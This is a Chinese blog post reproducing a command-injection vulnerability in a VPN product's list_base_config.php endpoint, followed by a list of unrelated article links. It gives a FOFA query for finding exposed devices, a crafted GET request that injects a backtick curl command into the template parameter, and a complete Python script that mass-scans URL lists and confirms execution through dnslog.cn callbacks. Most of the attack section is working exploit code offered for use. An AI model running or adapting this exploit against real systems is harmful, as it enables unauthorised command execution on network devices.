当前位置: 首页 > news >正文

【漏洞复现】某某康达vpn——list_base_config.php——命令执行

news 来源:原创 2024/9/20 21:31:06

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

  • 漏洞描述
  • 漏洞复现
  • 测试工具

漏洞描述

网络设备是支撑计算机网络运行的重要硬件,包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器和无线接入点等。路由器负责网络间的数据转发和地址转换,交换机用于局域网内设备的互联和数据交换,网桥连接不同网段实现互通,网卡提供有线或无线网络接口。防火墙则对网络流量进行监控和控制,保护网络安全。某某康达vpn,其接口list_base_config.php存在命令执行漏洞,攻击者可通过该漏洞获取系统权限。

漏洞复现

1)信息收集
fofa:body="/images/raisecom/back.gif"
在这里插入图片描述

凡是过去,皆为序章;凡是未来,皆有可期。
在这里插入图片描述

获取DNSLog
在这里插入图片描述
构造数据包

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%DNS.log%60 HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

在这里插入图片描述
回到DNSLog查看回显
在这里插入图片描述
成功回显,验证成功。

测试工具

poc

import requests
import urllib3
import re,string,random
from urllib.parse import urljoin
import argparse
import time
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def read_file(file_path):with open(file_path, 'r') as file:urls = file.read().splitlines()return urlsdef check(url):url = url.rstrip("/")try:headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.0 Safari/537.13",}getdomain = requests.get(url='http://dnslog.cn/getdomain.php', headers={"Cookie": "PHPSESSID=5q814qoa1oi4ck076cjstma9g2"}, timeout=30)domain = str(getdomain.text)target_url = urljoin(url,"/vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%20{}%60".format(domain))requests.get(target_url, verify=False, headers=headers, timeout=40)for i in range(0, 3):refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers={"Cookie": "PHPSESSID=5q814qoa1oi4ck076cjstma9g2"}, timeout=30)time.sleep(2)if domain in refresh.text:print(f"\033[31mDiscovered:{url}: raiseco_list_base_config_RCE!\033[0m")return Trueexcept Exception as e:passif __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument("-u", "--url", help="URL")parser.add_argument("-f", "--txt", help="file")args = parser.parse_args()url = args.urltxt = args.txtif url:check(url)elif txt:urls = read_file(txt)for url in urls:check(url)else:print("help")

运行截图
在这里插入图片描述

你可以期待太阳从东方升起,而风却随心所欲地从四面八方吹来。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Qt Xlsx使用教程、Qt操作Excel、Qt生成Excel图表、跨平台不依赖Office 直接使用源码
  • 优化业务流程的关键:深入探讨BPA流程设计
  • qt-11基本对话框(消息框)
  • 【图形验证和AI智能及CHATGPT对抗影响的是用户体验】
  • 【大模型系列篇】Transformers综述--邱锡鹏
  • react的setState中为什么不能用++?
  • pygame开发课程系列(4): 游戏元素
  • 怎么直接在PDF上修改内容?随心编辑PDF内容
  • 日拱一卒(4)——leetcode学习记录:路径总和
  • python爬虫爬取某图书网页实例
  • Nginx禁用IP和IP段
  • 二叉树的判断
  • 详解 Redis 队列 实现
  • druid+logback打印sql执行日志
  • ubuntu 20 安装mysql workbench 过程
  • CentOS 7 修改主机名
  • Docker: 容器互访的三种方式
  • Js基础知识(四) - js运行原理与机制
  • js如何打印object对象
  • PHP的类修饰符与访问修饰符
  • Spring Cloud Alibaba迁移指南(一):一行代码从 Hystrix 迁移到 Sentinel
  • Synchronized 关键字使用、底层原理、JDK1.6 之后的底层优化以及 和ReenTrantLock 的对比...
  • TCP拥塞控制
  • tweak 支持第三方库
  • 百度小程序遇到的问题
  • 从零到一:用Phaser.js写意地开发小游戏(Chapter 3 - 加载游戏资源)
  • 记录:CentOS7.2配置LNMP环境记录
  • 配置 PM2 实现代码自动发布
  • 如何使用 JavaScript 解析 URL
  • 手机端车牌号码键盘的vue组件
  • 算法-插入排序
  • 听说你叫Java(二)–Servlet请求
  • 用 vue 组件自定义 v-model, 实现一个 Tab 组件。
  • 原创:新手布局福音!微信小程序使用flex的一些基础样式属性(一)
  • 原生js练习题---第五课
  • 阿里云服务器购买完整流程
  • # 日期待t_最值得等的SUV奥迪Q9:空间比MPV还大,或搭4.0T,香
  • #QT(QCharts绘制曲线)
  • #快捷键# 大学四年我常用的软件快捷键大全,教你成为电脑高手!!
  • (01)ORB-SLAM2源码无死角解析-(56) 闭环线程→计算Sim3:理论推导(1)求解s,t
  • (1)SpringCloud 整合Python
  • (2)关于RabbitMq 的 Topic Exchange 主题交换机
  • (八)Docker网络跨主机通讯vxlan和vlan
  • (差分)胡桃爱原石
  • (附源码)springboot工单管理系统 毕业设计 964158
  • (附源码)springboot助农电商系统 毕业设计 081919
  • (篇九)MySQL常用内置函数
  • (一) 初入MySQL 【认识和部署】
  • (原创)boost.property_tree解析xml的帮助类以及中文解析问题的解决
  • (转)Android学习笔记 --- android任务栈和启动模式
  • (转)linux自定义开机启动服务和chkconfig使用方法
  • (转)程序员技术练级攻略
  • ***php进行支付宝开发中return_url和notify_url的区别分析
  • .NET Standard、.NET Framework 、.NET Core三者的关系与区别?
  • .NET 设计模式—简单工厂(Simple Factory Pattern)